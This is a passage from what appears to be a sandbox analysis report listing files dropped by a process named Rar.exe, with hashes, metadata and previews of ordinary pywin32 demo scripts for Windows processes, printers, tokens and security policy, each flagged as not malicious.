                                                                                                                                                                                                                                  Preview:"""runproc.py..start a process with three inherited pipes..Try to write to and read from those.."""..import msvcrt.import os..import win32api.import win32con.import win32file.import win32pipe.import win32process.import win32security...class Process:. def run(self, cmdline):. # security attributes for pipes. sAttrs = win32security.SECURITY_ATTRIBUTES(). sAttrs.bInheritHandle = 1.. # create pipes. hStdin_r, self.hStdin_w = win32pipe.CreatePipe(sAttrs, 0). self.hStdout_r, hStdout_w = win32pipe.CreatePipe(sAttrs, 0). self.hStderr_r, hStderr_w = win32pipe.CreatePipe(sAttrs, 0).. # set the info structure for the new process.. StartupInfo = win32process.STARTUPINFO(). StartupInfo.hStdInput = hStdin_r. StartupInfo.hStdOutput = hStdout_w. StartupInfo.hStdError = hStderr_w. StartupInfo.dwFlags = win32process.STARTF_USESTDHANDLES. # Mark doesn't support wShowWindow yet.. # StartupInfo.dwFla
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2859
                                                                                                                                                                                                                                  Entropy (8bit):5.16397412167526
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:3Iusl8P/XKhIH+DvhcqR1sPH8C72hDhKqMhKNtwKGzQigwFz3rYA/9:3IuslyfJ+9NR1OOAQihz3rYA/9
                                                                                                                                                                                                                                  MD5:6358F39A6DC68902315A154AA803745C
                                                                                                                                                                                                                                  SHA1:32C7399756A96B1A7EC0CEC7708713B7A7B5A904
                                                                                                                                                                                                                                  SHA-256:008B4576E46966832603683F16735B22AD0950969DFA362FF593E169C665EB12
                                                                                                                                                                                                                                  SHA-512:F8492FE12112BA5F792D30E733F7530D40F1B0A4E39A2970CD70B3785B3EE68B3CF86B1E8DFFEDD949F1CE4718AA80CEC2E433076D416E6B9E2C71273A5C3968
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import pywintypes.import win32api.import win32con.import win32gui.import win32print..pname = win32print.GetDefaultPrinter().print(pname).p = win32print.OpenPrinter(pname).print("Printer handle: ", p).print_processor = win32print.GetPrinter(p, 2)["pPrintProcessor"].## call with last parm set to 0 to get total size needed for printer's DEVMODE.dmsize = win32print.DocumentProperties(0, p, pname, None, None, 0).## dmDriverExtra should be total size - fixed size.driverextra = (. dmsize - pywintypes.DEVMODEType().Size.) ## need a better way to get DEVMODE.dmSize.dm = pywintypes.DEVMODEType(driverextra).dm.Fields = dm.Fields | win32con.DM_ORIENTATION | win32con.DM_COPIES.dm.Orientation = win32con.DMORIENT_LANDSCAPE.dm.Copies = 2.win32print.DocumentProperties(. 0, p, pname, dm, dm, win32con.DM_IN_BUFFER | win32con.DM_OUT_BUFFER.)..pDC = win32gui.CreateDC(print_processor, pname, dm).printerwidth = win32print.GetDeviceCaps(pDC, win32con.PHYSICALWIDTH).printerheight = win32print.GetDeviceC
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5119
                                                                                                                                                                                                                                  Entropy (8bit):4.511953665676077
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:wIXZgAxi7KRWyEAkFY564o3qwi0JjfcAfB++IsYZ+zi:wIJ1A7cWyExOdo3qsjUAfB++UUi
                                                                                                                                                                                                                                  MD5:347610E8C7711F155A18C0D2F7C0352B
                                                                                                                                                                                                                                  SHA1:85807052AA60E4B5C373A4F58247F28D17687127
                                                                                                                                                                                                                                  SHA-256:7E0672B7B0DECDB4DE70FD6E60310F2C7680B6BB72637532CF9B1F7309C87C25
                                                                                                                                                                                                                                  SHA-512:74166363C0DF4D2E2AFE037DE405E964F57BD50DD5464D749861C46C4E1031969D13D62286283EA4EF202E04846DF86E34EEA47F554CDD259622185075975483
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# rastest.py - test/demonstrate the win32ras module..# Much of the code here contributed by Jethro Wright...import os.import sys..import win32ras..# Build a little dictionary of RAS states to decent strings..# eg win32ras.RASCS_OpenPort -> "OpenPort".stateMap = {}.for name, val in list(win32ras.__dict__.items()):. if name[:6] == "RASCS_":. stateMap[val] = name[6:]..# Use a lock so the callback can tell the main thread when it is finished..import win32event..callbackEvent = win32event.CreateEvent(None, 0, 0, None)...def Callback(hras, msg, state, error, exterror):. # print "Callback called with ", hras, msg, state, error, exterror. stateName = stateMap.get(state, "Unknown state?"). print("Status is %s (%04lx), error code is %d" % (stateName, state, error)). finished = state in [win32ras.RASCS_Connected]. if finished:. win32event.SetEvent(callbackEvent). if error != 0 or int(state) == win32ras.RASCS_Disconnected:. # we know for sure t
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3738
                                                                                                                                                                                                                                  Entropy (8bit):4.905364376160403
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:wbyTs6+DD1B+xkMJ6g09u1n5B82lHIOt8qtbvGAB2qX60:ti1B6kw702n5B82lHIvWNB2260
                                                                                                                                                                                                                                  MD5:7B913DC758A779FFDDEA7E0D37EBE7A5
                                                                                                                                                                                                                                  SHA1:663C68C7B556954444E5B5BAA991578B85A43871
                                                                                                                                                                                                                                  SHA-256:482D57BCEB5C175FFDB0C2BE6CD25CEF2131D8F327B47926C7DA699DB9A89A80
                                                                                                                                                                                                                                  SHA-512:C500AAB1BCD3DD9F005A65A173C0D0B63823952CE864BD0F4C10C44C549A86B02E437218720327E187C457666D5C94A2EFDE25A20E70BC4B62EC4655D44734DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Lists various types of information about current user's access token,. including UAC status on Vista."""..import pywintypes.import win32api.import win32con.import win32security.import winerror.from security_enums import (. SECURITY_IMPERSONATION_LEVEL,. TOKEN_ELEVATION_TYPE,. TOKEN_GROUP_ATTRIBUTES,. TOKEN_PRIVILEGE_ATTRIBUTES,. TOKEN_TYPE,.)...def dump_token(th):. token_type = win32security.GetTokenInformation(th, win32security.TokenType). print("TokenType:", token_type, TOKEN_TYPE.lookup_name(token_type)). if token_type == win32security.TokenImpersonation:. imp_lvl = win32security.GetTokenInformation(. th, win32security.TokenImpersonationLevel. ). print(. "TokenImpersonationLevel:",. imp_lvl,. SECURITY_IMPERSONATION_LEVEL.lookup_name(imp_lvl),. ).. print(. "TokenSessionId:",. win32security.GetTokenInformation(th, win32security.TokenSessionId),. ).. privs = win
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                                                  Entropy (8bit):5.2466444341148915
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1hmZwhp2hVJhBhh/zznnPUMSdDa4MYC/pkCO73AgELLGmrG73AKNn:13hcrJnhJ3nnPPSNXMYC/mEgELLwEYn
                                                                                                                                                                                                                                  MD5:A8EB3625681C9A6CC94C98E822B01430
                                                                                                                                                                                                                                  SHA1:866FD6D4341E8063991E151E331790C267719092
                                                                                                                                                                                                                                  SHA-256:16CA9F905009A0526D1D5ED466271F86F4F75663AE2E6AE7DA22A5E5AA585CDF
                                                                                                                                                                                                                                  SHA-512:C33BB12877845E24DA0529F2C2CE99B82DC5F83312D027E2FCBD7CF22B7441E205BFB3E508293E73D7F4C95ECC4FF79F8C2092720E6CD19A5B98A1F59CCC1628
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", "SeEnableDelegationPrivilege"),. win32con.SE_PRIVILEGE_ENABLED,. ), ##doesn't seem to be in ntsecuritycon.py ?.)..ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS.) ##win32con.TOKEN_ADJUST_PRIVILEGES).win32security.AdjustTokenPrivileges(th, 0, new_privs)..policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS).tmp_sid = win32security.LookupAccountName("", "tmp")[0]..privs = [. ntsecuri
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                  Entropy (8bit):5.24705878297574
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:8FBrRcYK5NhJ3PqF5VjhInHnp7PWKqocmucmPcmwcm9cmFcmZcmRcm3wK:Or+YK5NhJ/qHcnHp7PWKqocmucmPcmwb
                                                                                                                                                                                                                                  MD5:ECA138C7B9FBBEDA6649E1E09F0DF95D
                                                                                                                                                                                                                                  SHA1:D396A7CF23F109CC687B2D65A39EBC8631D5501B
                                                                                                                                                                                                                                  SHA-256:9A5B596AB47503F4E5FCB0D02D1B21C1AD94F1F036B981A99F4FE9C8501CA139
                                                                                                                                                                                                                                  SHA-512:1600C901014A6FCA6CCA41EAC797A6FA340E994D8613130074E2872FF294B09A6B76916A732DB31CF50E941591DCC12BB8BEC5D4494921AA67AFBBDCBAB6A2C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE..fname = os.path.join(win32api.GetTempPath(), "win32security_test.txt").f = open(fname, "w").f.write("Hello from Python\n").f.close().print("Testing on file", fname)..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win3
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1243
                                                                                                                                                                                                                                  Entropy (8bit):4.826107186911052
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1dVaWnVQMN4MvDZriSrxC8rrkiQOIiThZUIiCZfpirjFNn:1zXvDnxC8rVUYf8jzn
                                                                                                                                                                                                                                  MD5:474FBFA718653659E1E7041B60B5CDC1
                                                                                                                                                                                                                                  SHA1:BDAD73C99EBB28EB782B81F6B9365C8D9F53A429
                                                                                                                                                                                                                                  SHA-256:EE3264A6EA5BC3EF455DB3B1308E6D6EFD153736B3864C6AFFE3CF83A4C1DD29
                                                                                                                                                                                                                                  SHA-512:952543CA9A75A9D3F3CB0B6C573AE1CA58849370EF5FD4D3A2A5D3DB6BEBAADC54EE226C317F8C9DE1C6C101BE4DB82F692D284C722D3873ED82F9405B1660AE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32api.import win32file.import win32security..policy_handle = win32security.GetPolicyHandle("rupole", win32security.POLICY_ALL_ACCESS)..## mod_nbr, mod_time = win32security.LsaQueryInformationPolicy(policy_handle,win32security.PolicyModificationInformation).## print mod_nbr, mod_time..(. domain_name,. dns_domain_name,. dns_forest_name,. domain_guid,. domain_sid,.) = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyDnsDomainInformation.).print(domain_name, dns_domain_name, dns_forest_name, domain_guid, domain_sid)..event_audit_info = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyAuditEventsInformation.).print(event_audit_info)..domain_name, sid = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyPrimaryDomainInformation.).print(domain_name, sid)..domain_name, sid = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyAccou
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1142
                                                                                                                                                                                                                                  Entropy (8bit):5.222962792869748
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1hmZwhp2hVJhBhh/zznnPUMSdDabSsQZ8Nn:13hcrJnhJ3nnPPSN88qn
                                                                                                                                                                                                                                  MD5:3C91061F858441D3452E1DF39EA29436
                                                                                                                                                                                                                                  SHA1:1F0B24F95ADB0023492501653F89647D4AA4AE1F
                                                                                                                                                                                                                                  SHA-256:68A481C6BCD6FCDA88A0C957BFDF2CEFDAEE895E4FD1E61C00FF24792095A883
                                                                                                                                                                                                                                  SHA-512:64C9FA96B29218FE2E8F408633A4E4F76A4B2D5167DE27B4DBA5B11C357D6AA80313C6C5E6079FD77F453C1FD6021DE13BEDDEE61EE0373FF8F4E35FCD0A0152
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", "SeEnableDelegationPrivilege"),. win32con.SE_PRIVILEGE_ENABLED,. ), ##doesn't seem to be in ntsecuritycon.py ?.)..ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS.) ##win32con.TOKEN_ADJUST_PRIVILEGES).win32security.AdjustTokenPrivileges(th, 0, new_privs)..policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS)..sidlist = win32security.LsaEnumerateAccountsWithUserRight(. policy_handle,
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2014
                                                                                                                                                                                                                                  Entropy (8bit):4.963463813027583
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:5mRAZ3dglAepb18kfCy6Tq/wjRRzCNXd4mskDTq/deI3YG9P1Oi:5mmVdgR85MwjRRzCAfKMdbYG99Oi
                                                                                                                                                                                                                                  MD5:42D316038232ACEB8893229577D4388C
                                                                                                                                                                                                                                  SHA1:100EDC412265A66533472CC3117FCCB93866E1E2
                                                                                                                                                                                                                                  SHA-256:774AA56DBC4A7E982740EF586FC1A12584591D8B5EACC00E9E7FCEE81691A3B0
                                                                                                                                                                                                                                  SHA-512:0502AB71542AE07E451BE1EBCBE8755785D915F1F1AB16D3181EB03FB359A17353418767EEC64F5AB66B20EB41C97977B244EAEA32FBA8CB237D3AAA2556D71F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A Python port of the MS knowledge base article Q157234.# "How to deal with louserzed and renamed user and group names".# http://support.microsoft.com/default.aspx?kbid=157234..import sys..import pywintypes.from ntsecuritycon import *.from win32net import NetUserModalsGet.from win32security import LookupAccountSid...def LookupAliasFromRid(TargetComputer, Rid):. # Sid is the same regardless of machine, since the well-known. # BUILTIN domain is referenced.. sid = pywintypes.SID(). sid.Initialize(SECURITY_NT_AUTHORITY, 2).. for i, r in enumerate((SECURITY_BUILTIN_DOMAIN_RID, Rid)):. sid.SetSubAuthority(i, r).. name, domain, typ = LookupAccountSid(TargetComputer, sid). return name...def LookupUserGroupFromRid(TargetComputer, Rid):. # get the account domain Sid on the target machine. # note: if you were looking up multiple sids based on the same. # account domain, only need to call this once.. umi2 = NetUserModalsGet(TargetComputer, 2). domain_sid
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):532
                                                                                                                                                                                                                                  Entropy (8bit):4.892813022065808
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:4LeLhsLM5eLUSWKUHXAV/FTMNFSs4PNLAXKCJZplNPQM3AV/Fp:Z9c10HXAQFSflUzXplNxA1
                                                                                                                                                                                                                                  MD5:7FE72D1C66C68BF2236E8E5B4E06AD82
                                                                                                                                                                                                                                  SHA1:EAC9ACD7D5E552EDBC404028CAA862CD39574F23
                                                                                                                                                                                                                                  SHA-256:635057C3AFDD79AA63C70008E849DBE16DE3C3F0C42E46756AD66B3AC8B3A555
                                                                                                                                                                                                                                  SHA-512:FFC8ECB562BA19C51885C3BDFC7DFAEE8C76BF548E7F947B9637BAB7CAB7FD8384BED963EB3D62915ADDBA672AE283BCF25AD752F582E8DF762E014457B0711B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32event.import win32security..evt = win32event.CreateEvent(None, 0, 0, None).win32security.LsaRegisterPolicyChangeNotification(. win32security.PolicyNotifyAuditEventsInformation, evt.).print("Waiting for you change Audit policy in Management console ...").ret_code = win32event.WaitForSingleObject(evt, 1000000000).## should come back when you change Audit policy in Management console ....print(ret_code).win32security.LsaUnregisterPolicyChangeNotification(. win32security.PolicyNotifyAuditEventsInformation, evt.).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):472
                                                                                                                                                                                                                                  Entropy (8bit):4.864220721097227
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:4LM8ahSBkwMouLHPooPWBJvFlqo+/vokBLn5SWPooSK+wZ9vn:0aMXuUo+jv7avxUoZNn
                                                                                                                                                                                                                                  MD5:39AC2663BCC3306EC873C140CAE98CD7
                                                                                                                                                                                                                                  SHA1:DE14DA2DCEA2D2DCCC06323E81C2C4A58602CD36
                                                                                                                                                                                                                                  SHA-256:737176D134E0A8117D2AB9539CAB55D7D30BCF7E2ADD7F7C6B3BF65409B8256F
                                                                                                                                                                                                                                  SHA-512:6F72B6911C916E7DE0FC27F57618464150A2A1934E427B8BBFE1131EC574FFA6619AED33E1583520140B0B66DFB039329B0683AF0FBCD8965B6223A3E54108B3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32security..policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS).privatedata = "some sensitive data".keyname = "tmp".win32security.LsaStorePrivateData(policy_handle, keyname, privatedata).retrieveddata = win32security.LsaRetrievePrivateData(policy_handle, keyname).assert retrieveddata == privatedata..## passing None deletes key.win32security.LsaStorePrivateData(policy_handle, keyname, None).win32security.LsaClose(policy_handle).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):791
                                                                                                                                                                                                                                  Entropy (8bit):4.8217987561958005
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:4LzLM4L7+hpoS4ZfpKlzl4ryZCSYyGLPhs0KGbG+Jpt4eWd3uvaCTJTF72pOM:KujqM1l4yHY7sHKvJptn5NTJFipf
                                                                                                                                                                                                                                  MD5:36AE55ECA7E61DD9D9A9EB3CE6634D26
                                                                                                                                                                                                                                  SHA1:E8D7F767A8C2F23A7550EC885A9CD2E631D01068
                                                                                                                                                                                                                                  SHA-256:DFB854F3D6FFBCC306FA74A9F88DAAE17C669C018D1E4A40AD939DA9F497D043
                                                                                                                                                                                                                                  SHA-512:357D4D360A781292C9DDD89149A446A1909B0DEF0EBE38087A37B3C3F86F708548089B994BF3EFC3953171E44D02C690956848AFEF796EB5D12E303BEF034036
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32api.import win32security.import winerror.from ntsecuritycon import *...# This is a Python implementation of win32api.GetDomainName().def GetDomainName():. try:. tok = win32security.OpenThreadToken(win32api.GetCurrentThread(), TOKEN_QUERY, 1). except win32api.error as details:. if details[0] != winerror.ERROR_NO_TOKEN:. raise. # attempt to open the process token, since no thread token. # exists. tok = win32security.OpenProcessToken(win32api.GetCurrentProcess(), TOKEN_QUERY). sid, attr = win32security.GetTokenInformation(tok, TokenUser). win32api.CloseHandle(tok).. name, dom, typ = win32security.LookupAccountSid(None, sid). return dom...if __name__ == "__main__":. print("Domain name is", GetDomainName()).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1690
                                                                                                                                                                                                                                  Entropy (8bit):5.320880029428467
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Z57cjK3KmpnnPkS3NothAlWfwuMJXej9P7:z7cjYKmpPpdiPUF4x7
                                                                                                                                                                                                                                  MD5:6839DCBAFD537FCD03128D64D6DDAF88
                                                                                                                                                                                                                                  SHA1:1230CA9595A5556C8BEFD6E7F343499F86634C95
                                                                                                                                                                                                                                  SHA-256:7AE2098259C3EE6535460E061202B7345E6884EF561231E4D8505DA90A573554
                                                                                                                                                                                                                                  SHA-512:97A5744424DCC879947F10FC1A375CCA988A5A49A486D53744223ED64AC9E00F94731D4A033BB47EFF69432265CE8F091858C5DEC43C4B84D5EE42A8FAA17E09
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:fname = "h:\\tmp.reg"..import os..import ntsecuritycon.import pywintypes.import win32api.import win32con.import win32security..## regsave will not overwrite a file.if os.path.isfile(fname):. os.remove(fname)..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_BACKUP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES.).win32security.AdjustTokenPrivileges(th, 0, new_privs).my_sid = win32security.GetTokenInformation(th, ntse
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1121
                                                                                                                                                                                                                                  Entropy (8bit):5.34664595251249
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:14p2hdh8pnnPkShpotD3aWwHVsfrJKT/MAbhcgWGQRTv:14cjmpnnPkSHot2GfdEMAbhcgWr9
                                                                                                                                                                                                                                  MD5:2C220CB380A755404147D2E3BA4C5011
                                                                                                                                                                                                                                  SHA1:8FC74D6B17D8ABE8B70F9B2A2253D1D945B6F2FE
                                                                                                                                                                                                                                  SHA-256:F7F632E99DBDE61350D2A3184AE49DE93FF288D087EEA9221476B1487947F095
                                                                                                                                                                                                                                  SHA-512:BC1DB9C209C723BC943C13888CE202282E24E30105433304017CD22F9DD7DE852F895AA973D01C559B492184B82B7761304B53B065D07A244559C437FDCAB6D9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32api.import win32con.import win32security..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES.)..win32security.AdjustTokenPrivileges(th, 0, new_privs).hkey = win32api.RegOpenKey(. win32con.HKEY_LOCAL_MACHINE, None, 0, win32con.KEY_ALL_ACCESS.).win32api.RegCreateKey(hkey, "SYSTEM\\NOTMP").notmpkey = win32api.RegOpenKey(. hkey, "SYSTEM\\notmp", 0, win32con.ACCESS_SYSTEM_SECURITY.)..tmp_sid = win32security.LookupAccountName("", "tmp")[0].sacl = win32security.ACL().sacl.AddAuditAccessAce(win32security.ACL_REVISION, win32con.GENERIC_ALL, tmp_sid, 1, 1)..sd = win32security.SECURITY_DESCRIPTOR
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                  Entropy (8bit):5.121297598616513
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRWL/ReuCjpEBXVjRRBxarV24/2lgHg1g3/2lCRBLnH:kwLMuCyFjRMrVV+lgIgulOr
                                                                                                                                                                                                                                  MD5:585C9D69157820F89A295C77539CC0A7
                                                                                                                                                                                                                                  SHA1:2BF372C54C793C22FD252A31687F20B32ED1D40E
                                                                                                                                                                                                                                  SHA-256:07368D5693F1F59A9A75B0B8019622EF0C13686CF769F7A6FCF11C8298F9D6B7
                                                                                                                                                                                                                                  SHA-512:531A9CB035B034D5A51207FE39FA458D47E5AFF76A13B750AD4F9C4FD13E8E45A57EF9D1D39132D8699D39459204D255A773428C9509481A3E4DA4F0A3F9B3E7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import pywintypes.import win32security..sa = pywintypes.SECURITY_ATTRIBUTES().tmp_sid = win32security.LookupAccountName("", "tmp")[0].sa.SetSecurityDescriptorOwner(tmp_sid, 0).sid = sa.SECURITY_DESCRIPTOR.GetSecurityDescriptorOwner().print(win32security.LookupAccountSid("", sid)).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9455
                                                                                                                                                                                                                                  Entropy (8bit):5.099713879626992
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:obgfeul5n5WEfqvrV9f0V2dVElGv6/cAc1lFblMQ/1978KOeVb21BbeAqlbxN4xT:o/fl2x
                                                                                                                                                                                                                                  MD5:1022B8A344444AE8ED0CE8B28B63B356
                                                                                                                                                                                                                                  SHA1:89F0A09E8B9A4BE32C6062F42BE4ABE7115BD6F2
                                                                                                                                                                                                                                  SHA-256:91BA21A23BF7AB044F49A8E7E7264ACFF0109DE3281D30969BED0FFCFE4FC6B0
                                                                                                                                                                                                                                  SHA-512:2706E6EDC6983E86BFA1CDF6777881254ABBF7359CF41D74D68C7E586E0DE294576F6F4DEB7628155CC339E2155A8D41E2137291B2AA22BBB6A75C1AA8565EE9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32security.import winnt...class Enum:. def __init__(self, *const_names):. """Accepts variable number of constant names that can be found in either. win32security, ntsecuritycon, or winnt.""". for const_name in const_names:. try:. const_val = getattr(win32security, const_name). except AttributeError:. try:. const_val = getattr(ntsecuritycon, const_name). except AttributeError:. try:. const_val = getattr(winnt, const_name). except AttributeError:. raise AttributeError(. 'Constant "%s" not found in win32security, ntsecuritycon, or winnt.'. % const_name. ). setattr(self, const_name, const_val).. def lookup_name(self, const_val):. """Looks up the name of a particular value.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3372
                                                                                                                                                                                                                                  Entropy (8bit):5.295959335066199
                                                                                                                                                                                                                                  Encrypted:false
